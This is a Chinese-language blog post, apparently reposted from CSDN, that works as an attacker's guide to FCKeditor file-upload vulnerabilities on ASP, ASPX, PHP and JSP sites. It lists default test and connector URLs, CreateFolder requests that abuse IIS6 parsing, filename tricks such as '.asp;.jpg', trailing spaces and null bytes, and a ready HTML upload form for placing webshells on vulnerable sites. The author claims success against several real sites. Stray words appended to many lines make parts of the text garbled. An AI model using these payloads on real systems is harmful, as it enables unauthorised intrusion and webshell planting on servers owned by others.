目錄php
FCKeditorhtml
asp網頁python
aspx網頁linux
php網頁shell
jsp網頁 編程
FCKeditor
FCKeditor是一個功能強大支持所見即所得功能的文本編輯器,能夠爲用戶提供微軟office軟件同樣的在線文檔編輯服務。它不須要安裝任何形式的客戶端,兼容絕大多數主流瀏覽器,支持ASP.Net、ASP、ColdFusion 、PHP、Java、Active-FoxPro、Lasso、Perl、python 等編程環境。windows
查看編輯器版本:瀏覽器
/fckeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html
一些FCK默認連接(以asp爲例):服務器
上傳測試頁面:Fckeditor編輯器默認會存在test.html和uploadtest.html文件,直接訪問這些文件能夠獲取當前文件夾文件名稱以及上傳文件,有的版本能夠直接上傳任意文件類型,測試上傳地址有: FCKeditor/editor/filemanager/browser/default/connectors/test.html FCKeditor/editor/filemanager/upload/test.html FCKeditor/editor/filemanager/connectors/test.html FCKeditor/editor/filemanager/connectors/uploadtest.html 示例頁面: FCKeditor/_samples/default.html FCKeditor/_samples/asp/sample01.asp FCKeditor/_samples/asp/sample02.asp FCKeditor/_samples/asp/sample03.asp FCKeditor/_samples/asp/sample04.asp 鏈接器: FCKeditor/editor/filemanager/connectors/asp/connector.asp FCKeditor/editor/filemanager/connectors/aspx/connector.aspx 建立文件夾連接: FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/&NewFolderName=test 上傳頁面: Fckeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=connectors/asp/connector.Asp Fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/browser.html?Type=all&Connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/browser.html?Type=/&Connector=connectors/asp/connector.asp FCKeditor/editor/filemanager/browser/default/browser.html?Type=monyer&Connector=connectors/asp/connector.asp 有時候,網站管理員會把上傳頁面禁止建立文件夾和上傳文件,可是因爲網站管理員的配置不當,咱們的鏈接器寫絕對路徑的話,有時候能夠建立文件夾和上傳文件 Fckeditor/editor/filemanager/browser/default/browser.html?Type=file&Connector=http://ww.xxx.com/connectors/asp/connector.Asp Fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://ww.xxx.com/connectors/asp/connector.asp Fckeditor/editor/filemanager/browser/default/browser.html?Type=Flash&Connector=http://ww.xxx.com/connectors/asp/connector.asp
FCKeditor 文件上傳「.」變「_」下劃線的繞過方法jsp
不少時候上傳的文件例如: 或shell.asp;.jpg 會變爲shell_asp;.jpg 這是新版FCK 的變化。
- 繼續上傳同名文件可變爲shell.php;(1).jpg ,可是新版Fckeditor也修復了這個漏洞。
若是服務器有解析漏洞的話,能夠建立文件夾來突破
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp
asp網頁
asp通常是搭在Windows Server主機上,Web Server版本通常爲 IIS6 / IIS7 / IIS7.5。據我如今所知,asp版的fckeditor已經能夠全秒了。
< 2.4.x 版本的File參數時爲黑名單驗證,能夠經過上傳.asa、.cer、.asp;jpg(針對IIS6)。若是asa、cer不被解析,還能夠傳.asp[空格]。傳的方法就是抓包而後在數據包裏的文件名後填個空格。
對於 2.5.x 和 2.6.x 版本,若是是IIS6.0 ,能夠經過突破變」.」爲」_」限制建立.asp文件夾,代碼以下:
Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp
複製代碼而後往這個文件夾裏傳 jpg ,這個很少說了。
若是是IIS7及以上,這種方法就gg了。這個時候能夠藉助剛爆出來的那種方法,先傳shell.asp%00txt,而後再傳一次。
至此,asp版本已經全秒了。
aspx網頁
低版本同ASP版,2.6.x用剛爆出來的二次上傳已經很差使了,不過新建test.asp的文件夾還能夠使。通常IIS6.0會支持asp,能夠先傳個asp上去,而後再XX。
php網頁
1:低版本(2.4.x及如下),仍然爲黑名單驗證,windows主機能夠使用php[空格]傳,2.4.3的有個media未設置致使任意文件上傳能夠秒linux。
2:2.5.x之後是白名單驗證,僅能寄但願於wooyun裏爆的那個<2.6.4的任意文件上傳,成功率有限。
3:2.6.4以上的php版,據我所知沒戲,求高人指點!我粗略的看了一下它的驗證邏輯,表示沒戲,windows裏的敏感字符全給過濾了。
4:當FCKeditor 版本 <=2.4.2的php網頁在處理PHP 上傳的地方並未對Media 類型進行上傳文件類型的控制,致使用戶上傳任意文件!將如下保存爲html文件,修改action地址爲存在漏洞網頁的連接。
<form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br> <input type="file" name="NewFile" size="50"><br> <input id="btnUpload" type="submit" value="Upload"> </form>
jsp網頁
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F
上傳馬所在目錄
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
上傳shell的地址
http://www.xxx.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector
跟版本有關係.並非百分百成功. 測試成功幾個站.
不能通殺.很遺憾.
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
若是以上地址不行能夠試試
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector FCKeditor/_samples/ FCKeditor/_samples/default.html FCKeditor/editor/fckeditor.htm FCKeditor/editor/fckdialog.html
轉載文章:https://blog.csdn.net/wizardforcel/article/details/50695885
https://blog.csdn.net/lizhengnanhua/article/details/38451737